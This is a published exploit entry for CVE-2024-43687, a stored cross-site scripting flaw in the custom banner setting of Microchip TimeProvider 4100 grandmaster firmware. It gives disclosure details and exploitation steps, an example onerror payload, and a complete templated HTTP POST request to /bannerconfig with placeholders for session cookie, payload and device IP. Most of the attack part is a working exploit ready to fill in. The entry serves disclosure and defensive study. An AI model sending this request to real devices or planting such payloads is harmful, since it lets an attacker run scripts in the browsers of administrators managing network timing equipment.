Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)

# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)

# Exploit Author: Armando Huesca Prida

# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli

# Date of Disclosure: 27/06/2024

# Date of CVE Publication: 4/10/2024

# Exploit Publication: 10/10/2024

# Vendor Homepage: https://www.microchip.com/

# Version: Firmware release 1.0 through 2.4.7

# Tested on: Firmware release 2.3.12 

# CVE: CVE-2024-43687

# External References:

# URL: https://www.cve.org/cverecord?id=CVE-2024-43687

# URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html

# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner

# URL: https://www.gruppotim.it/it/footer/red-team.html





# Vulnerability Description:



The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context.





# Exploitation Steps:



1- Log in to the device's web management interface.

2- Open the banner configuration panel.

3- Select the "custom banner" feature.

4- Insert the malicious JavaScript payload.

5- Apply and save the system configuration containing the custom banner.

6- Victims who connect to the device's web management interface will execute the malicious payload in their browser.





# Example of malicious JavaScript payload:



<img src=a onerror=alert(1)>





# Proof of Concept - PoC:



By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values ​​that must be updated in the exploit HTTP request is given below:

- [session cookie]

- [malicious JavaScript payload]

- [device IP]





# Exploit - HTTP Request:



POST /bannerconfig HTTP/1.1

Host: [device IP]

Cookie: ci_session=[session cookie]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502

Content-Length: 673

Origin: https://[device IP]

Referer: https://[device IP]/bannerconfig

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

Te: trailers

Connection: keep-alive



-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="user_level"



1

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="bannerradio"



CUSTOMIZED

-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="txtcustom"



[malicious JavaScript payload]



-----------------------------9680247575877256312575038502

Content-Disposition: form-data; name="action"



applybanner

-----------------------------9680247575877256312575038502--







# End